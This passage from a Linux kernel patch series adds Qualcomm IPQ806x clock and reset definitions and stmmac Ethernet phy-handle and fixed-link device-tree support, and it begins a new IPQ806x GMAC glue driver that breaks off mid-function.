.n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss, + .clkr = { + .enable_reg = 0x3d40, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "ubi32_core2_src_clk", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + .flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE, + }, + }, +}; + static struct clk_regmap *gcc_ipq806x_clks[] = { [PLL0] = &pll0.clkr, [PLL0_VOTE] = &pll0_vote, @@ -2211,6 +2728,7 @@ static struct clk_regmap *gcc_ipq806x_clks[] = { [PLL8_VOTE] = &pll8_vote, [PLL14] = &pll14.clkr, [PLL14_VOTE] = &pll14_vote, + [PLL18] = &pll18.clkr, [GSBI1_UART_SRC] = &gsbi1_uart_src.clkr, [GSBI1_UART_CLK] = &gsbi1_uart_clk.clkr, [GSBI2_UART_SRC] = &gsbi2_uart_src.clkr, @@ -2307,6 +2825,18 @@ static struct clk_regmap *gcc_ipq806x_clks[] = { [USB_FS1_SYSTEM_CLK] = &usb_fs1_sys_clk.clkr, [EBI2_CLK] = &ebi2_clk.clkr, [EBI2_AON_CLK] = &ebi2_aon_clk.clkr, + [GMAC_CORE1_CLK_SRC] = &gmac_core1_src.clkr, + [GMAC_CORE1_CLK] = &gmac_core1_clk.clkr, + [GMAC_CORE2_CLK_SRC] = &gmac_core2_src.clkr, + [GMAC_CORE2_CLK] = &gmac_core2_clk.clkr, + [GMAC_CORE3_CLK_SRC] = &gmac_core3_src.clkr, + [GMAC_CORE3_CLK] = &gmac_core3_clk.clkr, + [GMAC_CORE4_CLK_SRC] = &gmac_core4_src.clkr, + [GMAC_CORE4_CLK] = &gmac_core4_clk.clkr, + [UBI32_CORE1_CLK_SRC] = &ubi32_core1_src_clk.clkr, + [UBI32_CORE2_CLK_SRC] = &ubi32_core2_src_clk.clkr, + [NSSTCM_CLK_SRC] = &nss_tcm_src.clkr, + [NSSTCM_CLK] = &nss_tcm_clk.clkr, }; static const struct qcom_reset_map gcc_ipq806x_resets[] = { @@ -2425,6 +2955,48 @@ static const struct qcom_reset_map gcc_ipq806x_resets[] = { [USB30_1_PHY_RESET] = { 0x3b58, 0 }, [NSSFB0_RESET] = { 0x3b60, 6 }, [NSSFB1_RESET] = { 0x3b60, 7 }, + [UBI32_CORE1_CLKRST_CLAMP_RESET] = { 0x3d3c, 3}, + [UBI32_CORE1_CLAMP_RESET] = { 0x3d3c, 2 }, + [UBI32_CORE1_AHB_RESET] = { 0x3d3c, 1 }, + [UBI32_CORE1_AXI_RESET] = { 0x3d3c, 0 }, + [UBI32_CORE2_CLKRST_CLAMP_RESET] = { 0x3d5c, 3 }, + [UBI32_CORE2_CLAMP_RESET] = { 0x3d5c, 2 }, + [UBI32_CORE2_AHB_RESET] = { 0x3d5c, 1 }, + [UBI32_CORE2_AXI_RESET] = { 0x3d5c, 0 }, + [GMAC_CORE1_RESET] = { 0x3cbc, 0 }, + [GMAC_CORE2_RESET] = { 0x3cdc, 0 }, + [GMAC_CORE3_RESET] = { 0x3cfc, 0 }, + [GMAC_CORE4_RESET] = { 0x3d1c, 0 }, + [GMAC_AHB_RESET] = { 0x3e24, 0 }, + [NSS_CH0_RST_RX_CLK_N_RESET] = { 0x3b60, 0 }, + [NSS_CH0_RST_TX_CLK_N_RESET] = { 0x3b60, 1 }, + [NSS_CH0_RST_RX_125M_N_RESET] = { 0x3b60, 2 }, + [NSS_CH0_HW_RST_RX_125M_N_RESET] = { 0x3b60, 3 }, + [NSS_CH0_RST_TX_125M_N_RESET] = { 0x3b60, 4 }, + [NSS_CH1_RST_RX_CLK_N_RESET] = { 0x3b60, 5 }, + [NSS_CH1_RST_TX_CLK_N_RESET] = { 0x3b60, 6 }, + [NSS_CH1_RST_RX_125M_N_RESET] = { 0x3b60, 7 }, + [NSS_CH1_HW_RST_RX_125M_N_RESET] = { 0x3b60, 8 }, + [NSS_CH1_RST_TX_125M_N_RESET] = { 0x3b60, 9 }, + [NSS_CH2_RST_RX_CLK_N_RESET] = { 0x3b60, 10 }, + [NSS_CH2_RST_TX_CLK_N_RESET] = { 0x3b60, 11 }, + [NSS_CH2_RST_RX_125M_N_RESET] = { 0x3b60, 12 }, + [NSS_CH2_HW_RST_RX_125M_N_RESET] = { 0x3b60, 13 }, + [NSS_CH2_RST_TX_125M_N_RESET] = { 0x3b60, 14 }, + [NSS_CH3_RST_RX_CLK_N_RESET] = { 0x3b60, 15 }, + [NSS_CH3_RST_TX_CLK_N_RESET] = { 0x3b60, 16 }, + [NSS_CH3_RST_RX_125M_N_RESET] = { 0x3b60, 17 }, + [NSS_CH3_HW_RST_RX_125M_N_RESET] = { 
0x3b60, 18 }, + [NSS_CH3_RST_TX_125M_N_RESET] = { 0x3b60, 19 }, + [NSS_RST_RX_250M_125M_N_RESET] = { 0x3b60, 20 }, + [NSS_RST_TX_250M_125M_N_RESET] = { 0x3b60, 21 }, + [NSS_QSGMII_TXPI_RST_N_RESET] = { 0x3b60, 22 }, + [NSS_QSGMII_CDR_RST_N_RESET] = { 0x3b60, 23 }, + [NSS_SGMII2_CDR_RST_N_RESET] = { 0x3b60, 24 }, + [NSS_SGMII3_CDR_RST_N_RESET] = { 0x3b60, 25 }, + [NSS_CAL_PRBS_RST_N_RESET] = { 0x3b60, 26 }, + [NSS_LCKDT_RST_N_RESET] = { 0x3b60, 27 }, + [NSS_SRDS_N_RESET] = { 0x3b60, 28 }, }; static const struct regmap_config gcc_ipq806x_regmap_config = { @@ -2453,6 +3025,8 @@ static int gcc_ipq806x_probe(struct platform_device *pdev) { struct clk *clk; struct device *dev = &pdev->dev; + struct regmap *regmap; + int ret; /* Temporary until RPM clocks supported */ clk = clk_register_fixed_rate(dev, "cxo", NULL, CLK_IS_ROOT, 25000000); @@ -2463,7 +3037,25 @@ static int gcc_ipq806x_probe(struct platform_device *pdev) if (IS_ERR(clk)) return PTR_ERR(clk); - return qcom_cc_probe(pdev, &gcc_ipq806x_desc); + ret = qcom_cc_probe(pdev, &gcc_ipq806x_desc); + if (ret) + return ret; + + regmap = dev_get_regmap(dev, NULL); + if (!regmap) + return -ENODEV; + + /* Setup PLL18 static bits */ + regmap_update_bits(regmap, 0x31a4, 0xffffffc0, 0x40000400); + regmap_write(regmap, 0x31b0, 0x3080); + + /* Set GMAC footswitch sleep/wakeup values */ + regmap_write(regmap, 0x3cb8, 8); + regmap_write(regmap, 0x3cd8, 8); + regmap_write(regmap, 0x3cf8, 8); + regmap_write(regmap, 0x3d18, 8); + + return 0; } static int gcc_ipq806x_remove(struct platform_device *pdev) diff --git a/include/dt-bindings/clock/qcom,gcc-ipq806x.h b/include/dt-bindings/clock/qcom,gcc-ipq806x.h index ebd63fd05649..dc4254b8cbbc 100644 --- a/include/dt-bindings/clock/qcom,gcc-ipq806x.h +++ b/include/dt-bindings/clock/qcom,gcc-ipq806x.h @@ -289,5 +289,7 @@ #define UBI32_CORE1_CLK 279 #define UBI32_CORE2_CLK 280 #define EBI2_AON_CLK 281 +#define NSSTCM_CLK_SRC 282 +#define NSSTCM_CLK 283 #endif diff --git a/include/dt-bindings/reset/qcom,gcc-ipq806x.h b/include/dt-bindings/reset/qcom,gcc-ipq806x.h index 0ad5ef930b5d..de9c8140931a 100644 --- a/include/dt-bindings/reset/qcom,gcc-ipq806x.h +++ b/include/dt-bindings/reset/qcom,gcc-ipq806x.h @@ -129,4 +129,47 @@ #define USB30_1_PHY_RESET 112 #define NSSFB0_RESET 113 #define NSSFB1_RESET 114 +#define UBI32_CORE1_CLKRST_CLAMP_RESET 115 +#define UBI32_CORE1_CLAMP_RESET 116 +#define UBI32_CORE1_AHB_RESET 117 +#define UBI32_CORE1_AXI_RESET 118 +#define UBI32_CORE2_CLKRST_CLAMP_RESET 119 +#define UBI32_CORE2_CLAMP_RESET 120 +#define UBI32_CORE2_AHB_RESET 121 +#define UBI32_CORE2_AXI_RESET 122 +#define GMAC_CORE1_RESET 123 +#define GMAC_CORE2_RESET 124 +#define GMAC_CORE3_RESET 125 +#define GMAC_CORE4_RESET 126 +#define GMAC_AHB_RESET 127 +#define NSS_CH0_RST_RX_CLK_N_RESET 128 +#define NSS_CH0_RST_TX_CLK_N_RESET 129 +#define NSS_CH0_RST_RX_125M_N_RESET 130 +#define NSS_CH0_HW_RST_RX_125M_N_RESET 131 +#define NSS_CH0_RST_TX_125M_N_RESET 132 +#define NSS_CH1_RST_RX_CLK_N_RESET 133 +#define NSS_CH1_RST_TX_CLK_N_RESET 134 +#define NSS_CH1_RST_RX_125M_N_RESET 135 +#define NSS_CH1_HW_RST_RX_125M_N_RESET 136 +#define NSS_CH1_RST_TX_125M_N_RESET 137 +#define NSS_CH2_RST_RX_CLK_N_RESET 138 +#define NSS_CH2_RST_TX_CLK_N_RESET 139 +#define NSS_CH2_RST_RX_125M_N_RESET 140 +#define NSS_CH2_HW_RST_RX_125M_N_RESET 141 +#define NSS_CH2_RST_TX_125M_N_RESET 142 +#define NSS_CH3_RST_RX_CLK_N_RESET 143 +#define NSS_CH3_RST_TX_CLK_N_RESET 144 +#define NSS_CH3_RST_RX_125M_N_RESET 145 +#define NSS_CH3_HW_RST_RX_125M_N_RESET 146 
+#define NSS_CH3_RST_TX_125M_N_RESET 147 +#define NSS_RST_RX_250M_125M_N_RESET 148 +#define NSS_RST_TX_250M_125M_N_RESET 149 +#define NSS_QSGMII_TXPI_RST_N_RESET 150 +#define NSS_QSGMII_CDR_RST_N_RESET 151 +#define NSS_SGMII2_CDR_RST_N_RESET 152 +#define NSS_SGMII3_CDR_RST_N_RESET 153 +#define NSS_CAL_PRBS_RST_N_RESET 154 +#define NSS_LCKDT_RST_N_RESET 155 +#define NSS_SRDS_N_RESET 156 + #endif From 5790cf3c00c2f92aacba348e13f8a9a8f5dd96bd Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:47 -0700 Subject: [PATCH 482/872] stmmac: add phy-handle support to the platform layer On stmmac driver, PHY specification in device-tree was done using the non-standard property "snps,phy-addr". Specifying a PHY on a different MDIO bus that the one within the stmmac controller doesn't seem to be possible when device-tree is used. This change adds support for the phy-handle property, as specified in Documentation/devicetree/bindings/net/ethernet.txt. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- .../net/ethernet/stmicro/stmmac/stmmac_main.c | 28 ++++++++++++------- .../ethernet/stmicro/stmmac/stmmac_platform.c | 6 +++- include/linux/stmmac.h | 1 + 3 files changed, 24 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index e4f273976071..31c64169f2ec 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -52,6 +52,7 @@ #include "stmmac_ptp.h" #include "stmmac.h" #include +#include #define STMMAC_ALIGN(x) L1_CACHE_ALIGN(x) @@ -816,18 +817,25 @@ static int stmmac_init_phy(struct net_device *dev) priv->speed = 0; priv->oldduplex = -1; - if (priv->plat->phy_bus_name) - snprintf(bus_id, MII_BUS_ID_SIZE, "%s-%x", - priv->plat->phy_bus_name, priv->plat->bus_id); - else - snprintf(bus_id, MII_BUS_ID_SIZE, "stmmac-%x", - priv->plat->bus_id); + if (priv->plat->phy_node) { + phydev = of_phy_connect(dev, priv->plat->phy_node, + &stmmac_adjust_link, 0, interface); + } else { + if (priv->plat->phy_bus_name) + snprintf(bus_id, MII_BUS_ID_SIZE, "%s-%x", + priv->plat->phy_bus_name, priv->plat->bus_id); + else + snprintf(bus_id, MII_BUS_ID_SIZE, "stmmac-%x", + priv->plat->bus_id); - snprintf(phy_id_fmt, MII_BUS_ID_SIZE + 3, PHY_ID_FMT, bus_id, - priv->plat->phy_addr); - pr_debug("stmmac_init_phy: trying to attach to %s\n", phy_id_fmt); + snprintf(phy_id_fmt, MII_BUS_ID_SIZE + 3, PHY_ID_FMT, bus_id, + priv->plat->phy_addr); + pr_debug("stmmac_init_phy: trying to attach to %s\n", + phy_id_fmt); - phydev = phy_connect(dev, phy_id_fmt, &stmmac_adjust_link, interface); + phydev = phy_connect(dev, phy_id_fmt, &stmmac_adjust_link, + interface); + } if (IS_ERR(phydev)) { pr_err("%s: Could not attach to PHY\n", dev->name); diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c index 1664c0186f5b..8d23155a1a7e 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c @@ -28,6 +28,7 @@ #include #include #include +#include #include "stmmac.h" #include "stmmac_platform.h" @@ -144,13 +145,16 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, /* Default to phy auto-detection */ plat->phy_addr = -1; + /* If we find a phy-handle property, use it as the PHY */ + plat->phy_node = of_parse_phandle(np, "phy-handle", 0); + /* "snps,phy-addr" is not a standard property. 
Mark it as deprecated * and warn of its use. Remove this when phy node support is added. */ if (of_property_read_u32(np, "snps,phy-addr", &plat->phy_addr) == 0) dev_warn(&pdev->dev, "snps,phy-addr property is deprecated\n"); - if (plat->phy_bus_name) + if (plat->phy_node || plat->phy_bus_name) plat->mdio_bus_data = NULL; else plat->mdio_bus_data = diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h index 7f484a239f53..c735f5c91eea 100644 --- a/include/linux/stmmac.h +++ b/include/linux/stmmac.h @@ -99,6 +99,7 @@ struct plat_stmmacenet_data { int phy_addr; int interface; struct stmmac_mdio_bus_data *mdio_bus_data; + struct device_node *phy_node; struct stmmac_dma_cfg *dma_cfg; int clk_csr; int has_gmac; From 277323814e495616dd76409bec855f5c68f54988 Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:48 -0700 Subject: [PATCH 483/872] stmmac: add fixed-link device-tree support In case DT is used, this change adds the ability to the stmmac driver to detect a fixed-link PHY, instanciate it, and use it during phy_connect(). Fixed link PHYs DT usage is described in: Documentation/devicetree/bindings/net/fixed-link.txt Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/net/ethernet/stmicro/stmmac/stmmac_main.c | 2 +- .../net/ethernet/stmicro/stmmac/stmmac_platform.c | 12 +++++++++++- 2 files changed, 12 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index 31c64169f2ec..c46178cf4d50 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -856,7 +856,7 @@ static int stmmac_init_phy(struct net_device *dev) * device as well. * Note: phydev->phy_id is the result of reading the UID PHY registers. */ - if (phydev->phy_id == 0) { + if (!priv->plat->phy_node && phydev->phy_id == 0) { phy_disconnect(phydev); return -ENODEV; } diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c index 8d23155a1a7e..f3918c7e7eeb 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c @@ -148,6 +148,14 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, /* If we find a phy-handle property, use it as the PHY */ plat->phy_node = of_parse_phandle(np, "phy-handle", 0); + /* If phy-handle is not specified, check if we have a fixed-phy */ + if (!plat->phy_node && of_phy_is_fixed_link(np)) { + if ((of_phy_register_fixed_link(np) < 0)) + return -ENODEV; + + plat->phy_node = of_node_get(np); + } + /* "snps,phy-addr" is not a standard property. Mark it as deprecated * and warn of its use. Remove this when phy node support is added. */ @@ -212,8 +220,10 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, if (of_find_property(np, "snps,pbl", NULL)) { dma_cfg = devm_kzalloc(&pdev->dev, sizeof(*dma_cfg), GFP_KERNEL); - if (!dma_cfg) + if (!dma_cfg) { + of_node_put(np); return -ENOMEM; + } plat->dma_cfg = dma_cfg; of_property_read_u32(np, "snps,pbl", &dma_cfg->pbl); dma_cfg->fixed_burst = From b1c17215d718d8cf7f4443bf3a3033f623affdf1 Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:49 -0700 Subject: [PATCH 484/872] stmmac: add ipq806x glue layer The ethernet controller available in IPQ806x is a Synopsys DesignWare Gigabit MAC IP core, already supported by the stmmac driver. 
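The stmmac platform layer lets a SoC hook in with very little boilerplate: the common probe path in stmmac_pltfr_probe() matches the device's compatible string and copies per-SoC callbacks out of a stmmac_of_data entry. As a rough sketch of the shape of that entry (the hook names are the ones implemented by the new file added below):

	static const struct stmmac_of_data ipq806x_gmac_data = {
		.has_gmac	= 1,
		.setup		= ipq806x_gmac_setup,		/* one-time SoC setup at probe */
		.fix_mac_speed	= ipq806x_gmac_fix_mac_speed,	/* reprogram NSS clocks on link speed change */
	};
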
This glue layer implements some platform specific settings required to get the controller working on an IPQ806x based platform. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/net/ethernet/stmicro/stmmac/Kconfig | 14 + drivers/net/ethernet/stmicro/stmmac/Makefile | 1 + .../ethernet/stmicro/stmmac/dwmac-ipq806x.c | 365 ++++++++++++++++++ 3 files changed, 380 insertions(+) create mode 100644 drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c diff --git a/drivers/net/ethernet/stmicro/stmmac/Kconfig b/drivers/net/ethernet/stmicro/stmmac/Kconfig index 731e0453a7d4..cec147d1d34f 100644 --- a/drivers/net/ethernet/stmicro/stmmac/Kconfig +++ b/drivers/net/ethernet/stmicro/stmmac/Kconfig @@ -16,6 +16,7 @@ if STMMAC_ETH config STMMAC_PLATFORM tristate "STMMAC Platform bus support" depends on STMMAC_ETH + select MFD_SYSCON default y ---help--- This selects the platform specific bus support for the stmmac driver. @@ -36,6 +37,19 @@ config DWMAC_GENERIC platform specific code to function or is using platform data for setup. +config DWMAC_IPQ806X + tristate "QCA IPQ806x DWMAC support" + default ARCH_QCOM + depends on OF + select MFD_SYSCON + help + Support for QCA IPQ806X DWMAC Ethernet. + + This selects the IPQ806x SoC glue layer support for the stmmac + device driver. This driver does not use any of the hardware + acceleration features available on this SoC. Network devices + will behave like standard non-accelerated ethernet interfaces. + config DWMAC_LPC18XX tristate "NXP LPC18xx/43xx DWMAC support" default ARCH_LPC18XX diff --git a/drivers/net/ethernet/stmicro/stmmac/Makefile b/drivers/net/ethernet/stmicro/stmmac/Makefile index 92e714a48367..b3901616f4f6 100644 --- a/drivers/net/ethernet/stmicro/stmmac/Makefile +++ b/drivers/net/ethernet/stmicro/stmmac/Makefile @@ -6,6 +6,7 @@ stmmac-objs:= stmmac_main.o stmmac_ethtool.o stmmac_mdio.o ring_mode.o \ # Ordering matters. Generic driver must be last. obj-$(CONFIG_STMMAC_PLATFORM) += stmmac-platform.o +obj-$(CONFIG_DWMAC_IPQ806X) += dwmac-ipq806x.o obj-$(CONFIG_DWMAC_LPC18XX) += dwmac-lpc18xx.o obj-$(CONFIG_DWMAC_MESON) += dwmac-meson.o obj-$(CONFIG_DWMAC_ROCKCHIP) += dwmac-rk.o diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c new file mode 100644 index 000000000000..7e3129e7f143 --- /dev/null +++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c @@ -0,0 +1,365 @@ +/* + * Qualcomm Atheros IPQ806x GMAC glue layer + * + * Copyright (C) 2015 The Linux Foundation + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
+ */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "stmmac_platform.h" + +#define NSS_COMMON_CLK_GATE 0x8 +#define NSS_COMMON_CLK_GATE_PTP_EN(x) BIT(0x10 + x) +#define NSS_COMMON_CLK_GATE_RGMII_RX_EN(x) BIT(0x9 + (x * 2)) +#define NSS_COMMON_CLK_GATE_RGMII_TX_EN(x) BIT(0x8 + (x * 2)) +#define NSS_COMMON_CLK_GATE_GMII_RX_EN(x) BIT(0x4 + x) +#define NSS_COMMON_CLK_GATE_GMII_TX_EN(x) BIT(0x0 + x) + +#define NSS_COMMON_CLK_DIV0 0xC +#define NSS_COMMON_CLK_DIV_OFFSET(x) (x * 8) +#define NSS_COMMON_CLK_DIV_MASK 0x7f + +#define NSS_COMMON_CLK_SRC_CTRL 0x14 +#define NSS_COMMON_CLK_SRC_CTRL_OFFSET(x) (1 << x) +/* Mode is coded on 1 bit but is different depending on the MAC ID: + * MAC0: QSGMII=0 RGMII=1 + * MAC1: QSGMII=0 SGMII=0 RGMII=1 + * MAC2 & MAC3: QSGMII=0 SGMII=1 + */ +#define NSS_COMMON_CLK_SRC_CTRL_RGMII(x) 1 +#define NSS_COMMON_CLK_SRC_CTRL_SGMII(x) ((x >= 2) ? 1 : 0) + +#define NSS_COMMON_MACSEC_CTL 0x28 +#define NSS_COMMON_MACSEC_CTL_EXT_BYPASS_EN(x) (1 << x) + +#define NSS_COMMON_GMAC_CTL(x) (0x30 + (x * 4)) +#define NSS_COMMON_GMAC_CTL_CSYS_REQ BIT(19) +#define NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL BIT(16) +#define NSS_COMMON_GMAC_CTL_IFG_LIMIT_OFFSET 8 +#define NSS_COMMON_GMAC_CTL_IFG_OFFSET 0 +#define NSS_COMMON_GMAC_CTL_IFG_MASK 0x3f + +#define NSS_COMMON_CLK_DIV_RGMII_1000 1 +#define NSS_COMMON_CLK_DIV_RGMII_100 9 +#define NSS_COMMON_CLK_DIV_RGMII_10 99 +#define NSS_COMMON_CLK_DIV_SGMII_1000 0 +#define NSS_COMMON_CLK_DIV_SGMII_100 4 +#define NSS_COMMON_CLK_DIV_SGMII_10 49 + +#define QSGMII_PCS_MODE_CTL 0x68 +#define QSGMII_PCS_MODE_CTL_AUTONEG_EN(x) BIT((x * 8) + 7) + +#define QSGMII_PCS_CAL_LCKDT_CTL 0x120 +#define QSGMII_PCS_CAL_LCKDT_CTL_RST BIT(19) + +/* Only GMAC1/2/3 support SGMII and their CTL register are not contiguous */ +#define QSGMII_PHY_SGMII_CTL(x) ((x == 1) ? 
0x134 : \ + (0x13c + (4 * (x - 2)))) +#define QSGMII_PHY_CDR_EN BIT(0) +#define QSGMII_PHY_RX_FRONT_EN BIT(1) +#define QSGMII_PHY_RX_SIGNAL_DETECT_EN BIT(2) +#define QSGMII_PHY_TX_DRIVER_EN BIT(3) +#define QSGMII_PHY_QSGMII_EN BIT(7) +#define QSGMII_PHY_PHASE_LOOP_GAIN_OFFSET 12 +#define QSGMII_PHY_PHASE_LOOP_GAIN_MASK 0x7 +#define QSGMII_PHY_RX_DC_BIAS_OFFSET 18 +#define QSGMII_PHY_RX_DC_BIAS_MASK 0x3 +#define QSGMII_PHY_RX_INPUT_EQU_OFFSET 20 +#define QSGMII_PHY_RX_INPUT_EQU_MASK 0x3 +#define QSGMII_PHY_CDR_PI_SLEW_OFFSET 22 +#define QSGMII_PHY_CDR_PI_SLEW_MASK 0x3 +#define QSGMII_PHY_TX_DRV_AMP_OFFSET 28 +#define QSGMII_PHY_TX_DRV_AMP_MASK 0xf + +struct ipq806x_gmac { + struct platform_device *pdev; + struct regmap *nss_common; + struct regmap *qsgmii_csr; + uint32_t id; + struct clk *core_clk; + phy_interface_t phy_mode; +}; + +static int get_clk_div_sgmii(struct ipq806x_gmac *gmac, unsigned int speed) +{ + struct device *dev = &gmac->pdev->dev; + int div; + + switch (speed) { + case SPEED_1000: + div = NSS_COMMON_CLK_DIV_SGMII_1000; + break; + + case SPEED_100: + div = NSS_COMMON_CLK_DIV_SGMII_100; + break; + + case SPEED_10: + div = NSS_COMMON_CLK_DIV_SGMII_10; + break; + + default: + dev_err(dev, "Speed %dMbps not supported in SGMII\n", speed); + return -EINVAL; + } + + return div; +} + +static int get_clk_div_rgmii(struct ipq806x_gmac *gmac, unsigned int speed) +{ + struct device *dev = &gmac->pdev->dev; + int div; + + switch (speed) { + case SPEED_1000: + div = NSS_COMMON_CLK_DIV_RGMII_1000; + break; + + case SPEED_100: + div = NSS_COMMON_CLK_DIV_RGMII_100; + break; + + case SPEED_10: + div = NSS_COMMON_CLK_DIV_RGMII_10; + break; + + default: + dev_err(dev, "Speed %dMbps not supported in RGMII\n", speed); + return -EINVAL; + } + + return div; +} + +static int ipq806x_gmac_set_speed(struct ipq806x_gmac *gmac, unsigned int speed) +{ + uint32_t clk_bits, val; + int div; + + switch (gmac->phy_mode) { + case PHY_INTERFACE_MODE_RGMII: + div = get_clk_div_rgmii(gmac, speed); + clk_bits = NSS_COMMON_CLK_GATE_RGMII_RX_EN(gmac->id) | + NSS_COMMON_CLK_GATE_RGMII_TX_EN(gmac->id); + break; + + case PHY_INTERFACE_MODE_SGMII: + div = get_clk_div_sgmii(gmac, speed); + clk_bits = NSS_COMMON_CLK_GATE_GMII_RX_EN(gmac->id) | + NSS_COMMON_CLK_GATE_GMII_TX_EN(gmac->id); + break; + + default: + dev_err(&gmac->pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return -EINVAL; + } + + /* Disable the clocks */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val &= ~clk_bits; + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + /* Set the divider */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_DIV0, &val); + val &= ~(NSS_COMMON_CLK_DIV_MASK + << NSS_COMMON_CLK_DIV_OFFSET(gmac->id)); + val |= div << NSS_COMMON_CLK_DIV_OFFSET(gmac->id); + regmap_write(gmac->nss_common, NSS_COMMON_CLK_DIV0, val); + + /* Enable the clock back */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val |= clk_bits; + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + return 0; +} + +static void *ipq806x_gmac_of_parse(struct ipq806x_gmac *gmac) +{ + struct device *dev = &gmac->pdev->dev; + + gmac->phy_mode = of_get_phy_mode(dev->of_node); + if (gmac->phy_mode < 0) { + dev_err(dev, "missing phy mode property\n"); + return ERR_PTR(-EINVAL); + } + + if (of_property_read_u32(dev->of_node, "qcom,id", &gmac->id) < 0) { + dev_err(dev, "missing qcom id property\n"); + return ERR_PTR(-EINVAL); + } + + /* The GMACs are called 1 to 4 in the documentation, but to 
simplify the + * code and keep it consistent with the Linux convention, we'll number + * them from 0 to 3 here. + */ + if (gmac->id < 0 || gmac->id > 3) { + dev_err(dev, "invalid gmac id\n"); + return ERR_PTR(-EINVAL); + } + + gmac->core_clk = devm_clk_get(dev, "stmmaceth"); + if (IS_ERR(gmac->core_clk)) { + dev_err(dev, "missing stmmaceth clk property\n"); + return gmac->core_clk; + } + clk_set_rate(gmac->core_clk, 266000000); + + /* Setup the register map for the nss common registers */ + gmac->nss_common = syscon_regmap_lookup_by_phandle(dev->of_node, + "qcom,nss-common"); + if (IS_ERR(gmac->nss_common)) { + dev_err(dev, "missing nss-common node\n"); + return gmac->nss_common; + } + + /* Setup the register map for the qsgmii csr registers */ + gmac->qsgmii_csr = syscon_regmap_lookup_by_phandle(dev->of_node, + "qcom,qsgmii-csr"); + if (IS_ERR(gmac->qsgmii_csr)) { + dev_err(dev, "missing qsgmii-csr node\n"); + return gmac->qsgmii_csr; + } + + return NULL; +} + +static void *ipq806x_gmac_setup(struct platform_device *pdev) +{ + struct device *dev = &pdev->dev; + struct ipq806x_gmac *gmac; + int val; + void *err; + + gmac = devm_kzalloc(dev, sizeof(*gmac), GFP_KERNEL); + if (!gmac) + return ERR_PTR(-ENOMEM); + + gmac->pdev = pdev; + + err = ipq806x_gmac_of_parse(gmac); + if (err) { + dev_err(dev, "device tree parsing error\n"); + return err; + } + + regmap_write(gmac->qsgmii_csr, QSGMII_PCS_CAL_LCKDT_CTL, + QSGMII_PCS_CAL_LCKDT_CTL_RST); + + /* Inter frame gap is set to 12 */ + val = 12 << NSS_COMMON_GMAC_CTL_IFG_OFFSET | + 12 << NSS_COMMON_GMAC_CTL_IFG_LIMIT_OFFSET; + /* We also initiate an AXI low power exit request */ + val |= NSS_COMMON_GMAC_CTL_CSYS_REQ; + switch (gmac->phy_mode) 